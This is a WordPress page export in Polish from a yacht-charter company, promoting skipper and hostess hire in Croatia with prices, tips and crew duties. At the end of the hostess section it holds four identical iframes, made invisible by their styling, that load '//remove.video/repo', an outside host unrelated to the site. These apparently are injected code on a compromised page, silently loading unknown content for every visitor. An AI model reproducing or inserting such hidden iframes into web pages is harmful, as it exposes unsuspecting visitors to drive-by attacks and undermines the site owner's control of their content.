{"id":76514,"date":"2022-01-28T10:01:46","date_gmt":"2022-01-28T10:01:46","guid":{"rendered":"https:\/\/www.skippercity.com\/wynajac-skipera-hostesse-na-czarter-w-chorwacji\/"},"modified":"2024-02-21T11:19:08","modified_gmt":"2024-02-21T11:19:08","slug":"wynajac-skipera-hostesse-na-czarter-w-chorwacji","status":"publish","type":"page","link":"https:\/\/skippercity.com\/pl\/wynajac-skipera-hostesse-na-czarter-w-chorwacji\/","title":{"rendered":"Wynaj\u0105\u0107 skipera &amp; hostess\u0119 na czarter w Chorwacji"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"76514\" class=\"elementor elementor-76514 elementor-76354\" data-elementor-post-type=\"page\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-1e28c64b elementor-section-full_width elementor-section-height-min-height elementor-section-items-stretch elementor-section-content-middle elementor-section-height-default\" data-id=\"1e28c64b\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5ebe8c3c\" data-id=\"5ebe8c3c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-5942418e elementor-widget elementor-widget-heading\" data-id=\"5942418e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h1 class=\"elementor-heading-title elementor-size-default\">Wynaj\u0119cie skippera i hostessy<\/h1>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-28846c7 elementor-widget-divider--view-line elementor-widget elementor-widget-divider\" data-id=\"28846c7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"divider.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-divider\">\n\t\t\t<span class=\"elementor-divider-separator\">\n\t\t\t\t\t\t<\/span>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5dbef439 elementor-align-center elementor-widget elementor-widget-button\" data-id=\"5dbef439\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-lg\" href=\"https:\/\/skippercity.com\/pl\/uzyskaj-wycene-czarter-jachtow-chorwacja-2\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">Uzyskaj wycen\u0119 i wi\u0119cej informacji<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-5665ca32 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"5665ca32\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-19d9020a\" data-id=\"19d9020a\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-52440666\" data-id=\"52440666\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-55943148\" data-id=\"55943148\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-35966130 elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"35966130\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-553a21ca\" data-id=\"553a21ca\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-71bd2ad2 elementor-toc--minimized-on-tablet elementor-widget elementor-widget-table-of-contents\" data-id=\"71bd2ad2\" data-element_type=\"widget\" data-e-type=\"widget\" data-settings=\"{&quot;exclude_headings_by_selector&quot;:[],&quot;headings_by_tags&quot;:[&quot;h2&quot;,&quot;h3&quot;,&quot;h4&quot;,&quot;h5&quot;,&quot;h6&quot;],&quot;marker_view&quot;:&quot;numbers&quot;,&quot;no_headings_message&quot;:&quot;No headings were found on this page.&quot;,&quot;minimize_box&quot;:&quot;yes&quot;,&quot;minimized_on&quot;:&quot;tablet&quot;,&quot;hierarchical_view&quot;:&quot;yes&quot;,&quot;min_height&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_tablet&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]},&quot;min_height_mobile&quot;:{&quot;unit&quot;:&quot;px&quot;,&quot;size&quot;:&quot;&quot;,&quot;sizes&quot;:[]}}\" data-widget_type=\"table-of-contents.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__header\">\n\t\t\t\t\t\t<h4 class=\"elementor-toc__header-title\">\n\t\t\t\tSpis tre\u015bci\t\t\t<\/h4>\n\t\t\t\t\t\t\t\t\t\t<div class=\"elementor-toc__toggle-button elementor-toc__toggle-button--expand\" role=\"button\" tabindex=\"0\" aria-controls=\"elementor-toc__71bd2ad2\" aria-expanded=\"true\" aria-label=\"Open table of contents\"><svg aria-hidden=\"true\" class=\"e-font-icon-svg e-fas-chevron-down\" viewBox=\"0 0 448 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M207.029 381.476L12.686 187.132c-9.373-9.373-9.373-24.569 0-33.941l22.667-22.667c9.357-9.357 24.522-9.375 33.901-.04L224 284.505l154.745-154.021c9.379-9.335 24.544-9.317 33.901.04l22.667 22.667c9.373 9.373 9.373 24.569 0 33.941L240.971 381.476c-9.373 9.372-24.569 9.372-33.942 0z\"><\/path><\/svg><\/div>\n\t\t\t\t<div class=\"elementor-toc__toggle-button elementor-toc__toggle-button--collapse\" role=\"button\" tabindex=\"0\" aria-controls=\"elementor-toc__71bd2ad2\" aria-expanded=\"true\" aria-label=\"Close table of contents\"><svg aria-hidden=\"true\" class=\"e-font-icon-svg e-fas-chevron-up\" viewBox=\"0 0 448 512\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M240.971 130.524l194.343 194.343c9.373 9.373 9.373 24.569 0 33.941l-22.667 22.667c-9.357 9.357-24.522 9.375-33.901.04L224 227.495 69.255 381.516c-9.379 9.335-24.544 9.317-33.901-.04l-22.667-22.667c-9.373-9.373-9.373-24.569 0-33.941L207.03 130.525c9.372-9.373 24.568-9.373 33.941-.001z\"><\/path><\/svg><\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<div id=\"elementor-toc__71bd2ad2\" class=\"elementor-toc__body\">\n\t\t\t<div class=\"elementor-toc__spinner-container\">\n\t\t\t\t<svg class=\"elementor-toc__spinner eicon-animation-spin e-font-icon-svg e-eicon-loading\" aria-hidden=\"true\" viewBox=\"0 0 1000 1000\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\"><path d=\"M500 975V858C696 858 858 696 858 500S696 142 500 142 142 304 142 500H25C25 237 238 25 500 25S975 237 975 500 763 975 500 975Z\"><\/path><\/svg>\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-79cc9f9b\" data-id=\"79cc9f9b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-25b4f28c elementor-widget elementor-widget-text-editor\" data-id=\"25b4f28c\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<h2>Skipperzy i hostessy<\/h2>\n<p><a href=\"https:\/\/skippercity.com\/pl\/wynajac-skipera-hostesse-na-czarter-w-chorwacji\/\">Wynaj\u0119cie skippera z SkipperCity<\/a> to doskona\u0142y spos\u00f3b na beztroski i odm\u0142adzaj\u0105cy urlop \u017ceglarski. Tw\u00f3j skiper we\u017amie pe\u0142n\u0105 odpowiedzialno\u015b\u0107 za Tw\u00f3j statek, aby\u015b m\u00f3g\u0142 si\u0119 zrelaksowa\u0107 i cieszy\u0107 si\u0119 czasem sp\u0119dzonym na morzu i na l\u0105dzie.<\/p>\n<p>Tw\u00f3j skiper pomo\u017ce Ci r\u00f3wnie\u017c w nawigacji i upewni si\u0119, \u017ce zatrzymujesz si\u0119 w najbezpieczniejszych i najlepszych portach i marinach. Nasi skipperzy posiadaj\u0105 dobr\u0105 znajomo\u015b\u0107 okolicy, dzi\u0119ki czemu mog\u0105 zabra\u0107 Ci\u0119 na naj\u0142adniejsze pla\u017ce, do najlepszych restauracji i najpi\u0119kniejszych port\u00f3w.<\/p>\n<p>Skipperzy znaj\u0105 wiele sekretnych klejnot\u00f3w <a href=\"https:\/\/en.wikipedia.org\/wiki\/Adriatic_Sea\" target=\"_blank\" rel=\"noopener\">Adriatyku<\/a>, Morza \u015ar\u00f3dziemnego, <a href=\"https:\/\/skippercity.com\/pl\/zeglarstwo-chorwacja\/\">Chorwacji<\/a>, czy gdziekolwiek \u017ceglujesz. Gdziekolwiek pojedziesz, plan podr\u00f3\u017cy jest dostosowany do Twoich upodoba\u0144, sou mo\u017cesz zobaczy\u0107 t\u0119tni\u0105ce \u017cyciem miasta portowe oraz atrakcje historyczne i geograficzne.<\/p>\n<p>Zatrudniaj\u0105c naszego skippera masz r\u00f3wnie\u017c pewno\u015b\u0107, \u017ce otrzymujesz profesjonalnie przeszkolonego skippera ze wszystkimi potrzebnymi dokumentami, kt\u00f3ry ma du\u017ce do\u015bwiadczenie \u017ceglarskie. Pa\u0144stwa wygoda, ochrona i zadowolenie s\u0105 dla nas najwa\u017cniejsze, dlatego zatrudniamy tylko takich skipper\u00f3w, kt\u00f3rzy pracuj\u0105 zgodnie z naszymi najwy\u017cszymi oczekiwaniami.<\/p>\n<p>Je\u015bli chcieliby\u015bcie Pa\u0144stwo zarezerwowa\u0107 skippera na swoje wakacje \u017ceglarskie w dowolnym miejscu na \u015bwiecie, prosimy <a href=\"https:\/\/skippercity.com\/pl\/skontaktuj-sie-z-nami\/\">o kontakt z nami<\/a>.<\/p>\n<h2>Zatrudnij swojego skipera<\/h2>\n<p>Je\u015bli nie posiadasz licencji, nie oznacza to, \u017ce <a href=\"https:\/\/skippercity.com\/pl\/czarter-zaglowek-chorwacja\/\">\u017cagl\u00f3wki<\/a>, <a href=\"https:\/\/skippercity.com\/pl\/czarter-motorowki-chorwacja\/\">jachty<\/a> czy <a href=\"https:\/\/skippercity.com\/pl\/katamaran-czarter-chorwacja\/\">katamarany<\/a> s\u0105 poza zasi\u0119giem. Potrzebny jest tylko skiper, czyli osoba, kt\u00f3ra zamiast Ciebie p\u0142ywa \u017cagl\u00f3wk\u0105 lub prowadzi \u0142\u00f3d\u017a motorow\u0105.<\/p>\n<p>Cena wynaj\u0119cia skipera wynosi zwykle oko\u0142o 150-200 euro za dzie\u0144 plus koszty wy\u017cywienia i podr\u00f3\u017cy. Nie jest to najta\u0144szy wyb\u00f3r, ale je\u015bli podzielisz koszty mi\u0119dzy za\u0142og\u0119, to jest to do zniesienia, a dodatkowo w pewnym sensie dostajesz te\u017c do\u015bwiadczonego lokalnego przewodnika, kt\u00f3ry pomo\u017ce Ci dokona\u0107 najlepszych wybor\u00f3w na Twoich wakacjach.<\/p>\n<p>Skipper ma wszystkie uprawnienia, je\u015bli ty ich nie masz. Szyper to tak\u017ce kto\u015b, kto wie co nieco o w\u0119dkarstwie, \u017ceglarstwie, pogodzie i szukaniu bezpiecznego portu wieczorem.<\/p>\n<p>Pozwala Ci wybra\u0107 \u015bcie\u017ck\u0119 i, je\u015bli to konieczne, zmienia j\u0105 w zale\u017cno\u015bci od pogody. Dobry skipper to kto\u015b, kto da ci du\u017co do\u015bwiadczenia \u017ceglarskiego i zamieni ciebie i twoj\u0105 rodzin\u0119 lub przyjaci\u00f3\u0142 w za\u0142og\u0119, kt\u00f3ra pomo\u017ce ci prowadzi\u0107 twoj\u0105 \u017cagl\u00f3wk\u0119 lepiej, szybciej i bezpieczniej.<\/p>\n<p>Skipper oferuje Pa\u0144stwu niezapomniane lekcje, kt\u00f3re s\u0105 doskona\u0142ym punktem wyj\u015bcia do kursu \u017ceglarskiego. Pomagamy r\u00f3wnie\u017c w rekrutacji skippera z osobowo\u015bci\u0105 dostosowan\u0105 do za\u0142ogi, kt\u00f3ra go zatrudnia. Dlatego kapitan jest odpowiedzialny za bezpiecze\u0144stwo za\u0142ogi i statku, a jego polecenia musz\u0105 by\u0107 przestrzegane.<\/p>\n<h2>Pomocne wskaz\u00f3wki<\/h2>\n<ul>\n<li>Tw\u00f3j skiper mo\u017ce by\u0107 tak dyskretny lub zaanga\u017cowany, jak tego potrzebujesz. Po przybyciu na miejsce powiedz kapitanowi, czy chcesz, aby rejs by\u0142 bardziej prywatny.<br \/>Poinformuj o swoich preferencjach dotycz\u0105cych posi\u0142k\u00f3w &#8211; nie kr\u0119puj si\u0119 zaprosi\u0107 skippera na posi\u0142ek lub daj mu zna\u0107, \u017ce poczyniono ju\u017c pewne ustalenia na pok\u0142adzie.<\/li>\n<li>Tw\u00f3j skiper jest doskona\u0142ym \u017ar\u00f3d\u0142em informacji o okolicy i najlepiej strze\u017conych tajemnicach!<\/li>\n<li><a href=\"https:\/\/skippercity.com\/pl\/nasi-kapitanowie\/\">Nasi skipperzy<\/a> s\u0105 bardzo kompetentni i uprzejmi. Wi\u0119kszo\u015b\u0107 naszych go\u015bci zaprzyja\u017ania si\u0119 ze swoim skipperem i zawsze zatrudnia tego samego, kiedy wracaj\u0105!<\/li>\n<li>Napiwek dla skippera: Rekompensata w wysoko\u015bci 15-20 procent wynagrodzenia skippera jest doceniana za doskona\u0142\u0105 obs\u0142ug\u0119.<\/li>\n<\/ul>\n<h2>Odpowiedzialno\u015b\u0107 kapitana<\/h2>\n<h3>Nawigacja<\/h3>\n<p>Tw\u00f3j skiper zabierze Ci\u0119 w niemal\u017ce ka\u017cde miejsce w Twoim rejonie rejsu. Opr\u00f3cz samego prowadzenia jachtu, skipper b\u0119dzie odpowiedzialny za wszystkie istotne czynno\u015bci, w tym wyznaczanie trasy, komunikacj\u0119 z w\u0142adzami, \u015bledzenie warunk\u00f3w pogodowych oraz zapewnienie bezpiecze\u0144stwa wszystkich go\u015bci podczas rejsu.<\/p>\n<h3>Transport dinghy<\/h3>\n<p>Kiedy ponton jachtu musi dotrze\u0107 do brzegu, skipper mo\u017ce sterowa\u0107 t\u0105 ma\u0142\u0105 jednostk\u0105, aby zapewni\u0107 bezpieczn\u0105 podr\u00f3\u017c na l\u0105d.<\/p>\n<h3>Ochrona i konserwacja<\/h3>\n<p>Skipperzy s\u0105 odpowiedzialni za utrzymanie czystego i stabilnego pok\u0142adu przez ca\u0142y czas. Oznacza to utrzymywanie linek w czysto\u015bci i z dala od niebezpiecze\u0144stw oraz chowanie sprz\u0119tu, kt\u00f3ry nie jest u\u017cywany. Tw\u00f3j skiper uzupe\u0142ni r\u00f3wnie\u017c zbiorniki z wod\u0105 i gazem, ale go\u015bcie s\u0105 odpowiedzialni za uiszczenie wszelkich op\u0142at.<\/p>\n<h3>Noclegi<\/h3>\n<p>Tw\u00f3j skiper b\u0119dzie potrzebowa\u0142 prywatnego zakwaterowania na czas pobytu na pok\u0142adzie. Sprawd\u017a specyfikacj\u0119 \u0142odzi, aby upewni\u0107 si\u0119, \u017ce jest na niej wystarczaj\u0105co du\u017co miejsca dla Twojej imprezy oraz za\u0142ogi, kt\u00f3r\u0105 chcesz wynaj\u0105\u0107.<\/p>\n<h3>Provisioning<\/h3>\n<p>Oczekuje si\u0119, \u017ce zapewnisz zaopatrzenie dla wynaj\u0119tej za\u0142ogi. Mo\u017cesz to \u0142atwo uwzgl\u0119dni\u0107 podczas planowania podr\u00f3\u017cy, <a href=\"https:\/\/skippercity.com\/pl\/skontaktuj-sie-z-nami\/\">kontaktuj\u0105c si\u0119 z naszym managerem<\/a>, kt\u00f3ry pomo\u017ce Ci w razie pyta\u0144 dotycz\u0105cych zaopatrzenia.<\/p>\n<h3>Prywatno\u015b\u0107<\/h3>\n<p>Twoja prywatno\u015b\u0107 jest dla nas bardzo wa\u017cna. Nasi skipperzy mog\u0105 przebywa\u0107 tylko w swojej kabinie oraz w cz\u0119\u015bciach wsp\u00f3lnych jachtu.<\/p>\n<p><span style=\"text-decoration: underline;\"><br \/>\n  <strong>*Skiperzy nie s\u0105 odpowiedzialni za<\/strong><br \/>\n<\/span>: catering dla go\u015bci, pranie odzie\u017cy, opiek\u0119 nad dzie\u0107mi, uczenie go\u015bci \u017ceglowania (z wyj\u0105tkiem 'Friendly Skipper&#8217;), ani wykonywanie obowi\u0105zk\u00f3w poza obs\u0142ug\u0105 i serwisem jachtu.<\/p>\n<h2>Nasi skipperzy s\u0105 &#8230;<\/h2>\n<p>Nasi skipperzy s\u0105 do\u015bwiadczonymi i profesjonalnymi \u017ceglarzami, z wieloletnim sta\u017cem i sprawdzon\u0105 umiej\u0119tno\u015bci\u0105 dowodzenia \u0142odzi\u0105 i jej za\u0142og\u0105 w ka\u017cdych warunkach pogodowych.<\/p>\n<p>Niekt\u00f3rzy z nich to tak\u017ce mistrzowie regat, licencjonowani nurkowie, surferzy, wspinacze, instruktorzy \u017ceglarstwa i \u015bwietni kucharze.<\/p>\n<p><a href=\"https:\/\/skippercity.com\/pl\/\">Wynaj\u0119cie skippera z Skippercity<\/a> to doskona\u0142y spos\u00f3b na prawdziwie beztroskie i odm\u0142adzaj\u0105ce wakacje \u017ceglarskie. Tw\u00f3j skiper przejmie pe\u0142n\u0105 odpowiedzialno\u015b\u0107 za Tw\u00f3j statek, wi\u0119c mo\u017cesz si\u0119 zrelaksowa\u0107 i cieszy\u0107 si\u0119 czasem sp\u0119dzonym na morzu i na pla\u017cy.<\/p>\n<p>Gdziekolwiek pojedziesz, plan podr\u00f3\u017cy jest dostosowany do Twoich osobistych upodoba\u0144.<\/p>\n<h3>\u017beglarstwo jest dla nas wszystkich!<\/h3>\n<p>Kiedy zarezerwujesz naszego skipera, b\u0119dzie on m\u00f3g\u0142 zaj\u0105\u0107 si\u0119 Twoim jachtem i b\u0119dzie mia\u0142 wiedz\u0119 z pierwszej r\u0119ki o naszych destynacjach.<\/p>\n<p>Nasz\u0105 misj\u0105 jest sprawienie, aby wakacje pod \u017caglami by\u0142y dost\u0119pne dla ka\u017cdego, a robimy to poprzez zapewnienie profesjonalnych skipper\u00f3w, kt\u00f3rzy pomog\u0105 Ci w prowadzeniu jachtu w ci\u0105gu tygodnia.<\/p>\n<p>Mo\u017cesz si\u0119 zaanga\u017cowa\u0107 i nauczy\u0107 si\u0119 podstaw lub usi\u0105\u015b\u0107 wygodnie i zrelaksowa\u0107 si\u0119 podczas \u017ceglugi do nast\u0119pnego miejsca przeznaczenia.<\/p>\n<p>Ju\u017c do momentu wyp\u0142yni\u0119cia b\u0119dziesz w sta\u0142ym kontakcie z wyznaczonym skipperem, kt\u00f3ry pomo\u017ce Ci przygotowa\u0107 tras\u0119 i odpowie na wszystkie Twoje pytania. Wszyscy s\u0105 do\u015bwiadczonymi \u017ceglarzami, s\u0105 mili i wiedz\u0105 du\u017co o ka\u017cdej destynacji, aby zapewni\u0107 jak najlepsze <a href=\"https:\/\/skippercity.com\/pl\/zeglarstwo-chorwacja\/\">wakacje pod \u017caglami w Chorwacji<\/a>.<\/p>\n<h2>Skipper b\u0119dzie&#8230;<\/h2>\n<ul>\n<li>Nawiguj statkiem pomi\u0119dzy miejscami docelowymi<\/li>\n<li>Zapewnienie \u015bwiadomo\u015bci otaczaj\u0105cego \u015brodowiska<\/li>\n<li>Pomoc w rezerwacji restauracji i wydarze\u0144 na l\u0105dzie<\/li>\n<li>Wyczy\u015bci\u0107 zewn\u0119trzn\u0105 stron\u0119 jachtu<\/li>\n<li>Spanie na \u0142odzi (najlepiej w kabinie lub salonie)<\/li>\n<\/ul>\n<h2>Kapitan nie zamierza&#8230;<\/h2>\n<ul>\n<li>Wyczy\u015bci\u0107 wn\u0119trze jachtu<\/li>\n<li>Gotowa\u0107<\/li>\n<li>Zr\u00f3b zakupy spo\u017cywcze<\/li>\n<li>Nia\u0144czy\u0107 dziecko<\/li>\n<li>Podejmowanie nieracjonalnego ryzyka<\/li>\n<\/ul>\n<h2>Zatrudnij hostess\u0119<\/h2>\n<p>Gospodyni b\u0119dzie mia\u0142a kluczowe znaczenie dla Twojego urlopu, aby\u015b m\u00f3g\u0142 w pe\u0142ni si\u0119 zrelaksowa\u0107 i cieszy\u0107 wakacjami na jachcie. Przed wyjazdem zorganizuje dla Pa\u0144stwa ca\u0142y prowiant potrzebny do podr\u00f3\u017cy.<\/p>\n<p>Je\u015bli chodzi o jedzenie, poinformujesz j\u0105 wcze\u015bniej o swoich \u017cyczeniach, aby posi\u0142ki by\u0142y przygotowywane zgodnie z Twoimi upodobaniami.<\/p>\n<p>W czasie wakacji b\u0119dzie zaopatrywa\u0107 si\u0119 we wszystkie potrzebne rzeczy, przygotowywa\u0107 posi\u0142ki i przek\u0105ski oraz sprz\u0105ta\u0107 naczynia po sko\u0144czonym posi\u0142ku.<iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/p>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n<div><iframe id=\"embedPath\" style=\"height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/remove.video\/repo\"><\/iframe><\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-54e96221\" data-id=\"54e96221\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6c01c22a elementor-widget elementor-widget-template\" data-id=\"6c01c22a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"template.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-template\">\n\t\t\t\t\t<div data-elementor-type=\"section\" data-elementor-id=\"77217\" class=\"elementor elementor-77217 elementor-76339\" data-elementor-post-type=\"elementor_library\">\n\t\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-457e679b elementor-section-full_width elementor-section-height-min-height elementor-section-content-middle elementor-section-height-default\" data-id=\"457e679b\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-inner-column elementor-element elementor-element-33d83c77\" data-id=\"33d83c77\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-26c46f13 elementor-widget elementor-widget-text-editor\" data-id=\"26c46f13\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p style=\"text-align: center;\">Szukasz \u0142odzi?<\/p>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-7116d3fc elementor-align-center elementor-widget elementor-widget-button\" data-id=\"7116d3fc\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-md\" href=\"https:\/\/skippercity.com\/pl\/uzyskaj-wycene-czarter-jachtow-chorwacja-2\/\" target=\"_blank\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t\t\t\t<span class=\"elementor-button-text\">UZYSKAJ BEZP\u0141ATN\u0104 WYCEN\u0118<\/span>\n\t\t\t\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Wynaj\u0119cie skippera i hostessy Uzyskaj wycen\u0119 i wi\u0119cej informacji Spis tre\u015bci Skipperzy i hostessy Wynaj\u0119cie skippera z SkipperCity to doskona\u0142y spos\u00f3b na beztroski i odm\u0142adzaj\u0105cy urlop \u017ceglarski. Tw\u00f3j skiper we\u017amie pe\u0142n\u0105 odpowiedzialno\u015b\u0107 za Tw\u00f3j statek, aby\u015b m\u00f3g\u0142 si\u0119 zrelaksowa\u0107 i cieszy\u0107 si\u0119 czasem sp\u0119dzonym na morzu i na l\u0105dzie. Tw\u00f3j skiper pomo\u017ce Ci r\u00f3wnie\u017c w [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":408270,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-76514","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/pages\/76514","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/comments?post=76514"}],"version-history":[{"count":0,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/pages\/76514\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/media\/408270"}],"wp:attachment":[{"href":"https:\/\/skippercity.com\/pl\/wp-json\/wp\/v2\/media?parent=76514"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}